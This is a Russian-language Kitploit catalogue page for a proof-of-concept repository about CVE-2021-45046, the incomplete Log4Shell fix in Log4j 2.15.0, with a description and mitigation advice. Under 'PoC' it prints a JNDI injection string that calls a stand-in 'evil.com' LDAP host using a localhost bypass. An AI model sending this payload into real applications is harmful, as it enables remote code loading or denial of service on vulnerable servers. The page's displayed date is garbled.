Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Log4j_CVE-2021-45046 — Log4j 2.15.0 Повышение привилегий -- CVE-2021-45046 | Kitploit
Инструменты/GitHubGitHub/cckuailong/log4j_cve-2021-45046
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеСтатьи и ИсследованияОбучение и Образование
GitHubcckuailong/log4j_cve-2021-45046

Log4j_CVE-2021-45046

Log4j 2.15.0 Повышение привилегий -- CVE-2021-45046

Репозиторий
22784 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Log4j 2.15.0 Повышение привилегий -- CVE-2021-45046

Атака

Описание

Было обнаружено, что исправление для CVE-2021-44228 в Apache Log4j 2.15.0 было неполным в некоторых нестандартных конфигурациях. Это может позволить атакующим, контролирующим входные данные Thread Context Map (MDC), при использовании в конфигурации логирования нестандартного Pattern Layout с Context Lookup (например, $${ctx:loginId}) или шаблоном Thread Context Map (%X, %mdc, или %MDC) создавать вредоносные входные данные с использованием шаблона JNDI Lookup, что приводит к атаке типа «отказ в обслуживании» (DOS). Log4j 2.15.0 по умолчанию ограничивает JNDI LDAP-запросы локальным хостом. Обратите внимание, что предыдущие смягчающие меры, включающие настройку системного свойства log4j2.noFormatMsgLookup в true, НЕ устраняют эту конкретную уязвимость. Log4j 2.16.0 исправляет эту проблему, удаляя поддержку шаблонов поиска сообщений и отключая функциональность JNDI по умолчанию. Эту проблему можно смягчить в предыдущих версиях (<2.16.0) путем удаления класса JndiLookup из classpath (пример: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).

CVSS 3.7 -> 9

PoC

root@kitploit:~
${jndi:ldap://127.0.0.1#evil[.]com:1389/a}

Тема Log4shell

https://github.com/cckuailong/reapoc/tree/main/Topic/Log4j

Приглашаем внести вклад в reapoc

https://github.com/cckuailong/reapoc

Скачать инструмент